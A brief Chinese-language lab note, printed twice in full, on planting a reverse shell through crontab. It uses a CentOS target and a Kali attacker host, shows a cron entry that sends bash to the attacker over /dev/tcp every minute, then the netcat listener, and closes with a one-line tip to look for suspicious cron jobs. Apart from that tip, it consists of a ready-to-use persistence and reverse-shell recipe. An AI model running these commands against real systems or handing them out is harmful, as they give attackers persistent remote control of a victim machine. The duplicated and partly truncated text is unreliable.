crontab反弹shell
1.靶机:Centos 10.0.0.150
攻击者:kali 10.0.0.152
2.执行crontab -e 语句,执行文字编辑器来设定时程表,内定的文字编辑器是 VI
写入bas
* * * * * bash -i >& /dev/tcp/10.0.0.152/9999 0>&1
3.kali监听指定端口
nc -lvp 9999
获得shell
排查方法:查看可疑定时任务
crontab -e
crontab反弹shell
1.靶机:Centos 10.0.0.150
攻击者:kali 10.0.0.152
2.执行crontab -e 语句,执行文字编辑器来设定时程表,内定的文字编辑器是 VI
写入bas
* * * * * bash -i >& /dev/tcp/10.0.0.152/9999 0>&1
3.kali监听指定端口
nc -lvp 9999
获得shell
排查方法:查看可疑定时任务
crontab -e